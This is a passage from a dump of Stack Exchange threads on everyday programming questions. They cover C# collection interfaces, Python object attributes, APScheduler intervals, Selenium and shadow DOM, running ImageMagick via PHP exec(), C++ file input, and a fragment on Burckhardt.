ICollection you can modify the collection by using the methods like add\/remove. 
You don't have the liberty to do the same with IEnumerable.\n\nSimple Program:\n<code>using System;\nusing System.Collections;\nusing System.Collections.Generic;\n\nnamespace StackDemo\n{\n class Program \n {\n static void Main(string[] args)\n {\n List<Person> persons = new List<Person>();\n persons.Add(new Person(\"John\",30));\n persons.Add(new Person(\"Jack\", 27));\n\n ICollection<Person> personCollection = persons;\n IEnumerable<Person> personEnumeration = persons;\n\n \/\/ IEnumeration\n \/\/ IEnumration Contains only GetEnumerator method to get Enumerator and make a looping\n foreach (Person p in personEnumeration)\n { \n Console.WriteLine(\"Name:{0}, Age:{1}\", p.Name, p.Age);\n }\n\n \/\/ ICollection\n \/\/ ICollection Add\/Remove\/Contains\/Count\/CopyTo\n \/\/ ICollection is inherited from IEnumerable\n personCollection.Add(new Person(\"Tim\", 10));\n\n foreach (Person p in personCollection)\n {\n Console.WriteLine(\"Name:{0}, Age:{1}\", p.Name, p.Age); \n }\n Console.ReadLine();\n\n }\n }\n\n class Person\n {\n public string Name { get; set; }\n public int Age { get; set; }\n public Person(string name, int age)\n {\n this.Name = name;\n this.Age = age;\n }\n }\n}\n<\/code>\nAnswer: I remember it this way:\n\nIEnumerable has one method GetEnumerator() which allows one to read through the values in a collection but not write to it. Most of the complexity of using the enumerator is taken care of for us by the for each statement in C#. IEnumerable has one property: Current, which returns the current element.\nICollection implements IEnumerable and adds few additional properties the most use of which is Count. The generic version of ICollection implements the Add() and Remove() methods.\nIList implements both IEnumerable and ICollection, and add the integer indexing access to items (which is not usually required, as ordering is done in database).\nComment: Based on what you wrote ICollection and IList are the same. Please add what is added to IList that does not exist in ICollection.\nComment: ICollection VS IList, IList- only interface in the System.Collection that contains all functionality of IEnumerable and ICollection and additional functionality. IList has Insert and Remove methods. Both the methods accept index in their parameter. So, it supports index based operations over collection.\nAnswer: The basic idea of using <code>ICollection<\/code> is a provide an interface to readonly-access to some finite amount of data. In fact you have a ICollection.Count property. <code>IEnumerable<\/code> is more suitable for some chain of the data where you read till some logical point, some condition esplicitly specified by consumer or till the end of the enumeration.\nComment: TIL that [`ICollection`](http:\/\/msdn.microsoft.com\/en-us\/library\/System.Collections.ICollection%28v=vs.110%29.aspx) is read-only while [`ICollection`](http:\/\/msdn.microsoft.com\/en-us\/library\/c28hx0c4%28v=vs.110%29.aspx) is not.\nAnswer: What I have done in the past is declare my inner class collections using <code>IList<Class><\/code>, <code>ICollection<Class><\/code>or <code>IEnumerable<Class><\/code> (if static list) depending on whether or not I will have to do any number of the following in a method in my repository: enumerate, sort\/order or modify. When I just need to enumerate (and maybe sort) over objects then I create a temp <code>List<Class><\/code>to work with the collection within an IEnumerable method. 
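For example, a rough sketch of that pattern (the type and member names here are only placeholders, not taken from any real project):\n<code>private readonly List<Class> _items = new List<Class>();\n\npublic IEnumerable<Class> GetOrdered()\n{\n    \/\/ copy into a temporary List so it can be sorted without exposing the inner collection\n    List<Class> temp = new List<Class>(_items);\n    temp.Sort(); \/\/ assumes Class implements IComparable<Class>\n    return temp;\n}\n<\/code>\n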
I think this practice would only be effective if the collection is relatively small, but it may be good practice in general, idk. Please correct me if there is evidence as to why this would not good practice.\nAnswer: Navigation properties are typically defined as virtual so that they can take advantage of certain Entity Framework functionality such as lazy loading. \nIf a navigation property can hold multiple entities (as in many-to-many or one-to-many relationships), its type must be a list in which entries can be added, deleted, and updated, such as ICollection.\nhttps:\/\/www.asp.net\/mvc\/overview\/getting-started\/getting-started-with-ef-using-mvc\/creating-an-entity-framework-data-model-for-an-asp-net-mvc-application\nAnswer: Lets try thinking outside of the box with\/by logic and understand clearly these three interfaces in your question:\nWhen the class of some instance implements the System.Collection.IEnumerable interface then, in simple words, we can say that this instance is both enumerable and iterable, which means that this instance allows somehow in a single loop to go\/get\/pass\/traverse\/iterate over\/through all the items and elements that this instance contains.\nThis means that this is also possible to enumerate all the items and elements that this instance contains.\nEvery class that implements the System.Collection.IEnumerable interface also implements the GetEnumerator method that takes no arguments and returns an System.Collections.IEnumerator instance.\nInstances of System.Collections.IEnumerator interface behaves very similar to C++ iterators.\nWhen the class of some instance implements the System.Collection.ICollection interface then, in simple words, we can say that this instance is some collection of things.\nThe generic version of this interface, i.e. 
System.Collection.Generic.ICollection, is more informative because this generic interface explicitly states what is the type of the things in the collection.\nThis is all reasonable, rational, logical and makes sense that System.Collections.ICollection interface inherits from System.Collections.IEnumerable interface, because theoretically every collection is also both enumerable and iterable and this is theoretically possible to go over all the items and elements in every collection.\nSystem.Collections.ICollection interface represents a finite dynamic collection that are changeable, which means that exist items can be removed from the collection and new items can be added to the same collection.\nThis explains why System.Collections.ICollection interface has the \"Add\" and \"Remove\" methods.\nBecause that instances of System.Collections.ICollection interface are finite collections then the word \"finite\" implies that every collection of this interface always has a finite number of items and elements in it.\nThe property Count of System.Collections.ICollection interface supposes to return this number.\nSystem.Collections.IEnumerable interface does not have these methods and properties that System.Collections.ICollection interface has, because it does not make any sense that System.Collections.IEnumerable will have these methods and properties that System.Collections.ICollection interface has.\nThe logic also says that every instance that is both enumerable and iterable is not necessarily \na collection and not necessarily changeable.\nWhen I say changeable, I mean that don't immediately think that you can add or remove something from something that is both enumerable and iterable.\nIf I just created some finite sequence of prime numbers, for example, this finite sequence of prime numbers is indeed an instance of System.Collections.IEnumerable interface, because now I can go over all the prime numbers in this finite sequence in a single loop and do whatever I want to do with each of them, like printing each of them to the console window or screen, but this finite sequence of prime numbers is not an instance of System.Collections.ICollection interface, because this is not making sense to add composite numbers to this finite sequence of prime numbers.\nAlso you want in the next iteration to get the next closest larger prime number to the current prime number in the current iteration, if so you also don't want to remove exist prime numbers from this finite sequence of prime numbers.\nAlso you probably want to use, code and write \"yield return\" in the GetEnumerator method of the System.Collections.IEnumerable interface to produce the prime numbers and not allocating anything on the memory heap and then task the Garbage Collector (GC) to both deallocate and free this memory from the heap, because this is obviously both waste of operating system memory and decreases performance.\nDynamic memory allocation and deallocation on the heap should be done when invoking the methods and properties of System.Collections.ICollection interface, but not when invoking the methods and properties of System.Collections.IEnumerable interface (although System.Collections.IEnumerable interface has only 1 method and 0 properties).\nAccording to what others said in this Stack Overflow webpage, System.Collections.IList interface simply represents an orderable collection and this explains why the methods of System.Collections.IList interface work with indexes in contrast to these of System.Collections.ICollection 
interface.\nIn short System.Collections.ICollection interface does not imply that an instance of it is orderable, but System.Collections.IList interface does imply that.\nTheoretically ordered set is special case of unordered set.\nThis also makes sense and explains why System.Collections.IList interface inherits System.Collections.ICollection interface.\nAnswer: Googling brought me here, and I haven't seen anyone mention this yet. I just got bamboozled by an API that looks similar to the following:\n<code>void Load(object key)\nvoid Load(IEnumerable keys)\n<\/code>\nPassing in a string selects the <code>IEnumerable<\/code> overload, which is not what I (nor the API authors) intended. If the <code>IEnumerable<\/code> would have been an <code>ICollection<\/code> instead, then the <code>object<\/code> overload would have been selected for strings, which is the intention.\nJust something to think about when trying to express intent in APIs. I'd guess it's more common than not for people to use <code>IEnumerable<\/code> even when their intent is to treat the type as a collection and NOT include other types of enumerables (like <code>string<\/code>).\n","meta":{"source":"stackoverflow","title":"Why use ICollection and not IEnumerable or List on many-many\/one-many relationships?","dup_signals":{}},"subset":"stackexchange"} +{"text":"python object attributes and methods\n\nQuestion: In python all data is object and any object should have attributes and methods.\nDoes somebody know python object without any attributes and methods?\n<code>>>> len(dir(1))\n64\n<\/code>\nComment: yes just try it in python 2.7\nComment: Guys sorry, I tried it in Pycharm, it returns nothing, but when I tried it in IDLE, it returned a list of attributes and methods\nAnswer: This is easy to accomplish by overriding <code>__dir__<\/code> and <code>__getattribute__<\/code>:\n<code>class Empty(object):\n def __dir__(self):\n return []\n def __getattribute__(self, name):\n raise AttributeError(\"'{0}' object has no attribute '{1}'\".format(type(self).__name__, name))\n\ne = Empty()\ndir(e)\n[]\ne.__name__\nAttributeError: 'Empty' object has no attribute '__name__'\n<\/code>\n(In python2, <code>Empty<\/code> needs to be a new-style class, so the <code>class Empty(object):<\/code> is required; in python3 old-style classes are extinct so <code>class Empty:<\/code> is sufficient.)\nComment: @PauloScardine right, for Python2 you need to change it to `class Empty(object)`; I mentioned that right after the code.\nComment: @ecatmur: Wouldn't changing your answer to `class Empty(object):` make it work for both Python 2.2+ through 3.x?\nComment: `dir(x)` returning empty list doesn't means `x` has no attributes\/methods.\nComment: @PauloScardine you can override `__getattribute__` as well.\nComment: `e.__class__` results `__main__.Empty` even with your tricks.\nComment: @PauloScardine which version? http:\/\/ideone.com\/pcFfp `AttributeError: 'Empty' object has no attribute '__class__'` on everything I've tried.\nComment: `Python 2.7.2 (default, Jun 12 2011, 14:24:46) [MSC v.1500 64 bit (AMD64)]`\nComment: @PauloScardine http:\/\/ideone.com\/smVQh (have you forgotten to make it a new-style class?)\nComment: @martineau but it'd be *less elegant*... oh, fine, I'll change it. Cheers!\nComment: @ecatmur: +1 _Elegance_ is beholden to the eye. Some even think \"Explicit is better than implicit\".\nAnswer: Havn't came across any such object, which doesn;t have any attribute.. 
see below\n<code>In [74]: class dummy():\n ....: pass\n ....:\n\nIn [75]: d1 = dummy()\n\nIn [76]: dir(d1)\nOut[76]: ['__doc__', '__module__']\n\nIn [77]: len(dir(d1))\nOut[77]: 2\n<\/code>\neven None has attributes...\n<code>In [78]: dir(None)\nOut[78]:\n['__class__',\n '__delattr__',\n '__doc__',\n '__format__',\n '__getattribute__',\n '__hash__',\n '__init__',\n '__new__',\n '__reduce__',\n '__reduce_ex__',\n '__repr__',\n '__setattr__',\n '__sizeof__',\n '__str__',\n '__subclasshook__']\n<\/code>\nAnswer: Yes! (or no...)\n<code>def AMeta(name, bases, dct):\n class NoProp:\n pass\n del NoProp.__doc__\n del NoProp.__module__\n return NoProp\n\nclass A:\n __metaclass__ = AMeta\n\nprint dir(A), 'len', len(dir(A))\n\nprint\nprint 'but... A.__name__ is', A.__name__\nprint 'Delete it!'\ntry:\n del A.__name__\nexcept Exception as e:\n print 'Did not work: ', repr(e)\n\nprint\nprint 'and... A.__dict__ is', A.__dict__\nprint 'Delete it!'\ntry:\n del A.__dict__\nexcept Exception as e:\n print 'Did not work: ', repr(e)\n\nprint\nprint 'and... A.__bases__ is', A.__bases__\nprint 'Delete it!'\ntry:\n del A.__bases__\nexcept Exception as e:\n print 'Did not work: ', repr(e)\n\nprint \nprint 'What is the type of A?'\nt = type(A)\nprint t, 'which is a', type(t)\n\nprint \"All of these will raise an AttributeError:\"\nprint \"A.__class__, A.__module__, (and maybe some others which are usually there too...)\"\n<\/code>\nNormally, all objects have some attributes whatever these are. But when using metaclasses, you can customize the way the class is created, and there you have it.\nHowever, even if <code>dir<\/code> is empty, you can still access <code>A.__name__<\/code>, <code>A.__dict__<\/code>, <code>A.__bases__<\/code>.\nThis is what the tests I made gave me:\n<code>[] len 0\n\nbut... A.__name__ is NoProp\nDelete it!\nDid not work: TypeError('__name__ must be a string object',)\n\nand... A.__dict__ is {}\nDelete it!\nDid not work: TypeError('__dict__ must be a dictionary object',)\n\nand... A.__bases__ is ()\nDelete it!\nDid not work: TypeError('__bases__ must be a tuple object',)\n\nWhat is the type of A?\n<type 'classobj'> which is a <type 'type'>\nAll of these will raise an AttributeError:\nA.__class__, A.__module__, (and maybe some others which are usually there too...)\n<\/code>\nComment: so the answer is \"no\", even if dir(x) returns empty, x still has methods\/attributes.\nComment: @PauloScardine You're right, but that `A` class still passes his test. Doesn't it?\nComment: dir(len(1)) isn't the test. It's just visualization of question\nComment: What were you basing your facts on? What `dir` returned... Anyway, I added details, the answer is \"no\", but can *look* like \"yes\".\nAnswer: You can create an object without any \"public\" attributes and methods:\n<code>class Bare(object):\n pass\n<\/code>\nBut this object will have some internal\/standard methods and attributes:\n<code>>>> x = Bare()\n>>> dir(x)\n['__class__',\n '__delattr__',\n '__doc__',\n '__format__',\n '__getattribute__',\n '__hash__',\n '__init__',\n '__new__',\n '__reduce__',\n '__reduce_ex__',\n '__repr__',\n '__setattr__',\n '__sizeof__',\n '__str__',\n '__subclasshook__']\n<\/code>\nPython has no concept of enforced private methods and attributes, everything is exposed. However, by convention, you should avoid external access to methods and attributes beginning with <code>_<\/code>, these should be reserved for internal use (double underscores for Python internal methods). 
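A small illustration of that convention (the class here is made up just for the example):\n<code>class Account(object):\n    def __init__(self):\n        self.balance = 0   # public by convention\n        self._ledger = []  # leading underscore: intended for internal use, though still accessible\n<\/code>\n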
In practice you can check for an instance without any \"public\" attributes:\n<code>>>> filter(lambda a: a[0] != '_', dir(x))\n[]\n\n>>> len(filter(lambda a: a[0] != '_', dir(x)))\n0\n<\/code>\nEven if you cheat by overriding <code>__dir__<\/code> and <code>__getattribute__<\/code>, the built-in attributes are still there and can be accessed using <code>__getattribute__<\/code> from the parent class (thanks for martineau to point me this):\n<code>class FakeEmpty:\n def __dir__(self):\n return []\n def __getattribute__(self, name):\n raise AttributeError(\"'{0}' object has no attribute '{1}'\".format(type(self).__name__, name))\n\n>>> e = FakeEmpty()\n>>> object.__getattribute__(e, '__class__')\n__main__.Empty\n<\/code>\nSo the answer is: not really, but you can almost fake it. \nComment: you are inheriting from object class, the Bare class will have some attributes of object class\nComment: Indeed, you can declare \"old style\" classes that don't inherit from object, but should you do it in modern Python?\nComment: yes, new style class are very good, but my only point was, even in old style classes, object will have attributes :)\n","meta":{"source":"stackoverflow","title":"python object attributes and methods","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can we have a chat cast around a Designer?\n\nQuestion: Can we have chat casts with professional designers?\nFor example we pick a certain technique in photoshop or a certain element in design and we pick the brain of the designer for an hour (or a play by play of how that designer would go about it)?\nWould Jin (and other designers) be up for that?\nAnswer: I'd certainly be up for that. Given how very quiet the chat area generally is, it might give us a way to increase participation. If there's one thing lacking in the site currently -- it's inherent in the SE model, I think -- it's interaction. Time zones are a bit of a hurdle for real-time chat, but better something than nothing.\nIt would likely be more interesting and more useful if several designers participated in any given chat, rather than one. Everyone I know has his or her own way of approaching a given design challenge, and once you start talking Photoshop techniques, where there are a minimum of 10 ways to do almost anything, the more folks who are involved, the better.\nAnswer: I'd be happy to do this! I agree with Alan that it'd be nice to have multiple designers involved.\nAnswer: I bet if we ask nicely, we could get Jin, the SE designer, to do a chat with us. It could be a nice stepping stone. I'll ask around, see if we can get Jin in sometime. Anyone have a preference for what time to do it?\nComment: Speaking personally, which is the only way I know how to speak, after the New Year would be best. We're up to our ears in project deadlines until early January.\nComment: As for time, I prefer to avoid the 6 am to Noon (PST - UTC -8) time slot. Other than that I'm usually around, lo, even unto the wee hours. 
:)\n","meta":{"source":"graphicdesign.meta.stackexchange","title":"Can we have a chat cast around a Designer?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Python APScheduler, execute an interval between start_date and end_date\n\nQuestion: I have the following code snippet:\n<code>scheduler = TornadoScheduler()\nscheduler.add_job(tick2, 'interval', seconds=6)\n\nscheduler.start()\n<\/code>\nHow is it possible to configure a job to be executed on an interval of 5 seconds, but starting on date x at hour x1, and ending on date y at hour y2?\nFor example starting from 22th of Nov 14:30 and ending by 25th of November 23:00, it will execute a function every 5 seconds?\nThank you!\nAnswer: From <code>interval<\/code> trigger documentation, you can pass <code>start_date<\/code> and <code>end_date<\/code> as keyword arguments\nSo, your code should be\n<code>start_date = ... # can be string or datetime object\nend_date = ... # can be a string or a datetime object\nscheduler.add_job(tick2, 'interval', seconds=6, start_date=start_date, end_date=end_date)\n<\/code>\n","meta":{"source":"stackoverflow","title":"Python APScheduler, execute an interval between start_date and end_date","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why I cannot switch to Iframe on this website?\n\nQuestion: I am trying to switch to Iframe on this link https:\/\/www.walmart.com\/blocked but I cannot\n<code>driver.switch_to.frame(driver.find_element(By.CSS_SELECTOR, value='iframe'))\n<\/code>\ngives error\n<code>NoSuchElementException: Message: no such element: Unable to locate element: {\"method\":\"css selector\",\"selector\":\"iframe\"}\n<\/code>\nOr even if I try to do\n<code>driver.find_elements(driver.find_element(By.XPATH, value='\/\/iframe'))\n<\/code>\nI get error\n<code>InvalidSelectorException: Message: invalid selector: The result of the xpath expression \"\/\/iframe\" is: [object HTMLIFrameElement]. It should be an element.\n<\/code>\nAnswer: In the link which you shared, iframe tag is inside 'Shadow DOM', which is why selenium throws exception\nTry with JavaScript executor to access the web element in chrome, it will work.\nFor more details please do refer Handle Shadow DOM\nAnswer: The <code>iframes<\/code> are inside a shadow-root there. \nComment: is there way to access them via Python Selenium?\nComment: Sure, there are a lot of questions about it here. Personally I never had this on the work, but I saw such questions here.\n","meta":{"source":"stackoverflow","title":"Why I cannot switch to Iframe on this website?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Imagemagick PDF to JPG - execute well but don't create file\n\nQuestion: I am trying to convert PDF to JPG file with this code:\n<code>$pdf_file = 'text.pdf';\n$save_to = 'demo.jpg'; \/\/make sure that apache has permissions to write in this folder! (common problem)\n\/\/execute ImageMagick command 'convert' and convert PDF to JPG with applied settings\nexec('convert '.$pdf_file.' '.$save_to, $output, $return_var);\n\nif($return_var == 0) { \/\/if exec successfuly converted pdf to jpg\nprint \"Conversion OK\";\n}\nelse print \"Conversion failed.<br \/>\".$output;\n<\/code>\nAnd I get message Conversion OK but image file don't creates. When I tried this on the different server, then everything works. \nPermissions for root catalog are set to 777. I don't have any idea why it doesn't work... I don't know which versions of Imagemagick are installed on both servers. Maybe that is the problem ? 
In phpinfo() there is no information about version or anything.\nComment: Does the conversion work ok if executed on command line level?\nComment: You could verify the convert version and that it runs correctly with `exec('convert --version',$output); var_dump($output);`\nComment: One more thing. After I turned on the exec function i had to change `'convert '` to `'\/usr\/bin\/convert '`. Maybe this will help someone\nComment: Did you check if you have ghostscript installed on your machine\nAnswer: You are having trouble running \"convert\" because the PHP function exec() has been disabled in your php.ini file. \nWhen a exec() command is failing there are multiple steps that can be taken to troubleshoot the problem:\n\nVerify if safe mode is on. Specifically the docs say:\n\nNote: When safe mode is enabled, you can only execute files within the\n safe_mode_exec_dir. For practical reasons, it is currently not allowed\n to have .. components in the path to the executable.\n\nTurn on Error Reporting too see if that gives any more information. This can be accomplished by adding code like the following to the top of your script:\n<code>ini_set('display_errors', 1);\nini_set('error_reporting', E_ALL);\n<\/code>\nSimplify the exec() command to something that should always work:\n<code>exec('\/bin\/echo helloWorld',$output);\nvar_dump($output);\n<\/code>\n\nIn your specific case when you tried step #3 above, it returned null. Null is what PHP returns when the exec() function is disabled. Also, if you were able to turn on error reporting (step #2) the output would have looked something like the following:\n<code>PHP Warning: exec() has been disabled for security reasons in \/home\/path\/to\/file.php on line 2\nNULL\n<\/code>\nThe solution to this problem is to enable the exec function in php.ini or go to a host\/server that allows the function to be used.\nComment: Yes, you're right. When I add the code from second point, I got error that exec() is disabled. I also saw that in phpinfo there is section: disable_functions and there is shown the exec function. Thanks a lot\nAnswer: Try explicit error reporting: <code>error_reporting(E_ALL)<\/code>, maybe it gives warnings about exec permissions.\nAlso: With \"Permissions for root catalog\" you mean the folder from where you are executing and saving the files?\nComment: Yes, I didn't precise. The folder and all files that are in this folder have 777.\nThe error_reporting gives nothing.\nAnswer: Is safe mode enabled on the server?\nWhen safe mode is enabled, you can only execute files within the \n\nsafe_mode_exec_dir\n\nSee here for additional information:\nhttp:\/\/www.php.net\/manual\/en\/ini.sect.safe-mode.php#ini.safe-mode-exec-dir\nComment: A pity. It would have been such a nice solution. ;o)\n","meta":{"source":"stackoverflow","title":"Imagemagick PDF to JPG - execute well but don't create file","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it possible to include a .dll in a c++ compile\n\nQuestion: Hey so I'm using vscode as my IDE and I was wondering if it was possible to include the dll for glfw3 into my build as whenever I run the finished program I need the glfw3.dll in the same folder as the .exe for it to run. 
Does anybody know how I would add it and if it is even possible.\nAlso here is my .vscode tasks.json\n<code> {\n \"type\": \"cppbuild\",\n \"label\": \"C\/C++: g++.exe build active file\",\n \"command\": \"C:\\\\msys64\\\\mingw64\\\\bin\\\\g++.exe\",\n \"args\": [\n \"-fdiagnostics-color=always\",\n \"-static\",\n \"-g\",\n \"-std=c++17\",\n \"${file}\",\n \"-I\",\n \".\/include\",\n \"-L\",\n \".\/lib\",\n \"-lopengl32\",\n \"-lglew32\",\n \"-lglfw3dll\",\n \"-Wl,--subsystem,windows\",\n \"-o\",\n \"${fileDirname}\\\\${fileBasenameNoExtension}.exe\" \n ],\n \"options\": {\n \"cwd\": \"${fileDirname}\"\n },\n \"problemMatcher\": [\n \"$gcc\"\n ],\n \"group\": {\n \"kind\": \"build\",\n \"isDefault\": true\n },\n \"detail\": \"compiler: C:\\\\msys64\\\\mingw64\\\\bin\\\\g++.exe\"\n }\n<\/code>\nComment: You need to use a _post-build command_. I have no experience doing it in vscode. Maybe this link will help: https:\/\/www.codeproject.com\/Questions\/1276983\/How-to-implement-pre-post-build-event-in-VS-code.\nComment: DLLs are usually searched within environment variable PATH\nAnswer: You can use a build event to copy the DLL into your exe target directory or put the DLL in your PATH environment variable.\n","meta":{"source":"stackoverflow","title":"Is it possible to include a .dll in a c++ compile","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I prompt user many time for different filenames using a for loop?\n\nQuestion: I'm trying to open and read user input files with my C++ program.\nMy program has 2 functions; <code>Open_Read()<\/code> and <code>Enter_Filename()<\/code>.\nThe <code>Enter_Filename<\/code> asks the user to enter input filenames (from 1 to 4).\nThe function <code>Open_Read<\/code> opens and reads the content of the file and displays it. \nWhen <code>nb = 1<\/code> (1 <= nb <=4) the program works, but from <code>nb >=2<\/code> the program cannot open file (or cannot find the file).\nCan someone help me find the problem? \n<code>#include <iostream>\n#include <fstream>\n\nusing Namespace std;\n\nvoid Enter_Filename(const int& m, int& nb, char name[], double yy[], double xx[]);\nvoid Open_Read(ifstream&, char filename[], char name[], double yy[], double xx[], int &n, double &sd, char set1[]);\n\ndouble y[256], x[256];\n\nint main()\n{ \n ifstream in;\n char filename[7];\n char name[7];\n char set1[20];\n double yy[4];\n double xx[4];\n int n = 0;\n double sd = 0;\n int nb;\n int m = 4;\n\n Enter_Filename(m, nb, filename, &yy[4], &xx[4]);\n\nfor (int i = 1; i <= nb; i++)\n {\n Open_Read(in, &filename[i], &name[i], &yy[i], &xx[i], n, sd, &set1[i]);\n }\n\n cout << \"\\n\";\n system(\"PAUSE\");\n\n return 0;\n}\n<\/code>\nHere the function <code>Enter_Filename<\/code>:\n<code> void Enter_Filename(const int& m, int& nb, char name[], double yy[], double xx[])\n {\n cout << \"Please Enter the number of articles (1 <= nb <= 4)\\n\"\n \"Nb =\";\n cin >> nb;\n\n if (nb <= m)\n {\n for (int j = 1; j <= nb; j++)\n {\n cout << j << \".Article (e.g. input.txt, input1.txt...) 
=\";\n cin >> &name[j];\n cout << \"yy(\" << j << \") =\";\n cin >> yy[j];\n cout << \"xx(\" << j << \") =\";\n cin >> xx[j];\n }\n }\n }\n<\/code>\nAnd the function <code>Open_Read<\/code>:\n<code>void Open_Read(ifstream&, char filename[], char name[], double yy[], double xx[], int& n, double &sd, char set1[])\n{\n\n ifstream inf;\n\n \/\/cout << \"Enter the file name to be opened: \";\n\n \/\/cin >> fileName;\n\n inf.open(filename, ios::in);\n\n if (inf.fail())\n {\n cout << \"Opening \" << filename << \" file for reading\\n\";\n cout << \"---------------------------------------\\n\";\n cout << \"The \" << filename << \" file could not be opened!\\n\";\n cout << \"Possible errors:\\n\";\n cout << \"1. The file does not exist.\\n\";\n cout << \"2. The path was not found.\\n\";\n exit(1); \n }\n else\n {\n cout << \"fileName:\" << filename << endl;\n inf >> name >> set1;\n inf.ignore(numeric_limits<streamsize>::max(), '\\n');\n inf >> n >> sd;\n\n for (int i = 1; i <= n; i++)\n {\n inf >> y[i] >> x[i];\n\n printf(\"%3i: %10.3f %10.3f\\n\", i, y[i], x[i]);\n\n }\n\n y[0] = *yy;\n x[0] = x[0] + *xx;\n\n for (int i = 1; i <= n; i++)\n {\n y[i] = y[i - 1] + y[i];\n x[i] = x[i] + *xx;\n }\n }\n\n inf.close();\n\n cout << \"NAME:\" << name << endl;\n cout << \"SetID:\" << set1 << endl;\n cout << \"N =\" << n << endl;\n cout << \"SubD =\" << sd << endl;\n\n if (inf.fail())\n {\n cout << \"\\nThe file \" << filename << \" could not be closed!\\n\";\n exit(1);\n }\n return;\n}\n<\/code>\nI use two files: <code>input.txt<\/code> and <code>input1.txt<\/code>:\n<code> input.txt\n\n INPUT.TXT\n 1S12-111-433-3245 K\n 5 12.0000\n 0.000 12.290\n 1.840 0.170\n 1.480 6.190\n 1.220 17.100 \n 1.040 25.000\n\n input1.txt\n\n INPUT1.TXT\n 1S12-111-533-3245 P\n 3 12.0000\n .000 11.780\n 0.150 34.820\n 1.840 24.810\n<\/code>\nComment: `char filename[7];` can't hold multiple filenames. You probably meant to have something like `std::string filename[7];`\nComment: You should improve your indentation.\nComment: `Function1()` is a very bad name for _any_ function.\nComment: Your code indentation was really awful. You can't be a good programmer, if you are not able to do such elementary thing like the code indentation and style.\nComment: @mch thanks, i will do it.\nComment: @Dawid Ferenczy there is always a beginning to everything\nAnswer: This is a working version of your application:\n<code>#include \"stdafx.h\"\n#include <iostream>\n#include <fstream>\n#include <iosfwd>\n\nusing namespace std;\nvoid Enter_Filename(const int& m, int& nb, char name[], double yy[], double xx[], int j);\nvoid Open_Read(ifstream&, char filename[], char name[], double yy[], double xx[], int &n, double &sd, char set1[]);\n\ndouble y[256], x[256];\n\nint main()\n{\n ifstream in;\n char filename[4][10];\n\n char name[7];\n char set1[20];\n double yy[4];\n double xx[4];\n int n = 0;\n double sd = 0;\n int nb;\n int m = 4;\n\n cout << \"Please Enter the number of articles (1 <= nb <= 4)\\n\"\n \"Nb =\";\n cin >> nb;\n\n if (nb <= m)\n {\n for (int j = 0; j < nb; j++)\n {\n Enter_Filename(m, nb, filename[j], &yy[4], &xx[4], j);\n }\n }\n\n for (int i = 0; i < nb; i++)\n {\n Open_Read(in, filename[i], &name[i], &yy[i], &xx[i], n, sd, &set1[i]);\n }\n\n cout << \"\\n\";\n system(\"PAUSE\");\n\n return 0;\n}\n\nvoid Enter_Filename(const int& m, int& nb, char name[], double yy[], double xx[], int j)\n{\n\n cout << j << \".Article (e.g. input.txt, input1.txt...) 
=\";\n cin >> &name[0];\n cout << \"yy(\" << j << \") =\";\n cin >> yy[j];\n cout << \"xx(\" << j << \") =\";\n cin >> xx[j];\n\n}\n\nvoid Open_Read(ifstream&, char filenames[], char name[], double yy[], double xx[], int& n, double &sd, char set1[])\n{\n\n ifstream inf;\n\n \/\/cout << \"Enter the file name to be opened: \";\n\n \/\/cin >> fileName;\n char filename[11];\n memcpy(filename, filenames, 11);\n filename[10] = '\\0';\n\n inf.open(filename, ios::in);\n\n if (inf.fail())\n {\n cout << \"Opening \" << filename << \" file for reading\\n\";\n cout << \"---------------------------------------\\n\";\n cout << \"The \" << filename << \" file could not be opened!\\n\";\n cout << \"Possible errors:\\n\";\n cout << \"1. The file does not exist.\\n\";\n cout << \"2. The path was not found.\\n\";\n exit(1);\n }\n else\n {\n cout << \"fileName:\" << filename << endl;\n inf >> name >> set1;\n inf.ignore(numeric_limits<streamsize>::max(), '\\n');\n inf >> n >> sd;\n\n for (int i = 1; i <= n; i++)\n {\n inf >> y[i] >> x[i];\n\n printf(\"%3i: %10.3f %10.3f\\n\", i, y[i], x[i]);\n\n }\n\n y[0] = *yy;\n x[0] = x[0] + *xx;\n\n for (int i = 1; i <= n; i++)\n {\n y[i] = y[i - 1] + y[i];\n x[i] = x[i] + *xx;\n }\n }\n\n inf.close();\n\n cout << \"NAME:\" << name << endl;\n cout << \"SetID:\" << set1 << endl;\n cout << \"N =\" << n << endl;\n cout << \"SubD =\" << sd << endl;\n\n if (inf.fail())\n {\n cout << \"\\nThe file \" << filename << \" could not be closed!\\n\";\n exit(1);\n }\n return;\n}\n<\/code>\nI did not control what was coming out from your calculations, i only ensured that now it opens your files \nComment: i think you' re right, but with char filename[4][7] i have some difficulties to open a file using fstream\nComment: if 'filename' in inf.open(filename, ios::in); needs to be a char[] , then there will be no problems\nComment: inf.open(filename, ios::in) ; i tried several times but it did not work , i have the error c2664: cannot convert parameter 1 from 'char [][7] ' to ' const wchar_t*'\nComment: use Filename.c_str() instead of Filename in the call of ifstream::open\nComment: filename.c_str() does not work with char filename[4][7], not even with string filename[4][7]. But with string filename only\nComment: I edited the post with a working version of your code.\nComment: Good, can you please up my answer +1. tnx\nComment: it's done, it will appear when I reach 15 reputations\n","meta":{"source":"stackoverflow","title":"How can I prompt user many time for different filenames using a for loop?","dup_signals":{}},"subset":"stackexchange"} +{"text":"What did Jacob Burckhardt intend to say by 'turn within' and 'turn without'?\n\nQuestion: Source: The Well-Educated Mind (2 edn 2016), pp. 230-231.\n\nIt is to Jacob Burckhardt that we owe the popular conception of the \n Renaissance as the time when man began to be modern. Burckhardt writes, \"In the Middle Ages both sides of human consciousness\u2014that \n which was turned within as that which was turned without\u2014lay dreaming or half awake beneath a common veil. The veil was woven of faith, \n illusion, and childish prepossession, through which the world and history \n were seen clad in strange hues. Man was conscious of himself only as \n member of a race, people, party, family, or corporation\u2014only through \n some general category. In Italy this veil first melted into air: an objective \n treatment and consideration of the State and of all the things in this world \n became possible. 
